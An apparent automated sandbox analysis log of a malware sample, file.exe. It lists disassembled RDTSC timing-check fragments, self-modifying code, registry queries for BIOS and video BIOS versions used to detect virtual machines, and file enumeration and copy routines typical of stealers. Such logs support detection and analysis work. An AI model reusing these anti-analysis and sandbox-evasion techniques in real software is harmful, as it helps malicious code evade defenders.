                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B290C second address: 9B2916 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2916 second address: 9B2922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2922 second address: 9B2926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2926 second address: 9B2937 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FFBC91A3BDBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2937 second address: 9B293C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B293C second address: 9B2976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDCh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC91A3BE8h 0x00000013 jmp 00007FFBC91A3BDDh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2D8F second address: 9B2DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2DA9 second address: 9B2DB0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B3423 second address: 9B3429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B3429 second address: 9B3431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B3431 second address: 9B3435 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B6075 second address: 9B6079 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B6079 second address: 9B6084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9BAA83 second address: 9BAA8D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9BAA8D second address: 9BAA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9C5209 second address: 9C520D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9C520D second address: 9C5225 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007FFBC8B2DA96h 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D03A6 second address: 9D03C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BDAh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007FFBC91A3BE2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D8BA0 second address: 9D8BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9D8BA6 second address: 9D8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFBC91A3BD6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDAh 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E027D second address: 9E0281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E0281 second address: 9E02A1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E02A1 second address: 9E02A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E02A5 second address: 9E02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E041F second address: 9E0423 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E06C0 second address: 9E06DC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jo 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E06DC second address: 9E06FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC8B2DA96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FFBC8B2DA9Eh 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E06FD second address: 9E0722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC91A3BDEh 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FFBC91A3BD6h 0x00000013 pop esi 0x00000014 ja 00007FFBC91A3BDCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E087B second address: 9E08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFBC8B2DA96h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FFBC8B2DAA9h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E08A2 second address: 9E08AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E08AE second address: 9E08CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e je 00007FFBC8B2DA96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E08CE second address: 9E08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E0A54 second address: 9E0A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBC8B2DA9Ch 0x0000000a popad 0x0000000b jo 00007FFBC8B2DAC4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E0A70 second address: 9E0A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E0A74 second address: 9E0A7A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E0A7A second address: 9E0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FFBC91A3BD6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E142D second address: 9E1433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E3131 second address: 9E3137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E3137 second address: 9E313B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E313B second address: 9E3149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F22 second address: 9E2F3D instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 jmp 00007FFBC8B2DAA1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F3D second address: 9E2F47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F47 second address: 9E2F4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F4D second address: 9E2F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F69 second address: 9E2F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F6D second address: 9E2F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC91A3BDEh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E2F88 second address: 9E2FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC8B2DA9Bh 0x0000000b jmp 00007FFBC8B2DAA3h 0x00000010 jp 00007FFBC8B2DA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E5C1A second address: 9E5C24 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E5C24 second address: 9E5C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FFBC8B2DA96h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9E58DE second address: 9E58E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F425C second address: 9F4260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9F4260 second address: 9F426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A02FD7 second address: A02FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A02FDD second address: A02FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FFBC91A3BD6h 0x0000000d jmp 00007FFBC91A3BE5h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A02FFF second address: A03005 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A03005 second address: A0302F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFBC91A3BE8h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FFBC91A3BD6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A02B41 second address: A02B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A126A3 second address: A126B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FFBC91A3BD6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12AF2 second address: A12B08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12F85 second address: A12FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FFBC91A3BDEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A12FA8 second address: A12FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A13129 second address: A13145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FFBC91A3BE6h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A13467 second address: A1346E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1360C second address: A13614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17CAF second address: A17D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FFBC8B2DA98h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edx, dword ptr [ebp+122D2C77h] 0x00000028 push 00000004h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FFBC8B2DA98h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 0000001Ah 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 call 00007FFBC8B2DA99h 0x00000049 pushad 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17D0B second address: A17D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FFBC91A3BD6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17D1A second address: A17D3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FFBC8B2DA9Eh 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FFBC8B2DA96h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17D3F second address: A17D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007FFBC91A3BD6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FFBC91A3BD6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17D59 second address: A17D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17D69 second address: A17D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A17F94 second address: A17FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFBC8B2DAA6h 0x0000000f nop 0x00000010 sub dx, 1A78h 0x00000015 push dword ptr [ebp+122D2A3Bh] 0x0000001b mov dx, 1DFCh 0x0000001f push 1C538DC7h 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pushad 0x00000028 popad 0x00000029 pop esi 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A198A4 second address: A198AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A198AE second address: A198D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A198D7 second address: A198FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 jc 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FFBC91A3BDFh 0x00000018 pop ecx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A1949C second address: A194A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A194A5 second address: A194B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007FFBC91A3BD6h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C037C second address: 51C0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C03C8 second address: 51C03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C03CC second address: 51C03D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C03D2 second address: 51C0451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dh, C0h 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFBC91A3BE3h 0x0000001b sbb cx, E4BEh 0x00000020 jmp 00007FFBC91A3BE9h 0x00000025 popfd 0x00000026 mov di, cx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushad 0x0000002e call 00007FFBC91A3BE6h 0x00000033 pop eax 0x00000034 call 00007FFBC91A3BDBh 0x00000039 pop esi 0x0000003a popad 0x0000003b movsx edx, ax 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C0451 second address: 51C046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C046E second address: 51C0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 51C0474 second address: 51C0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 791BA3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 791AD2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 931174 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 93158E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 92FDF7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 9BBE28 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, | 0_2_005438B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, | 0_2_00544910
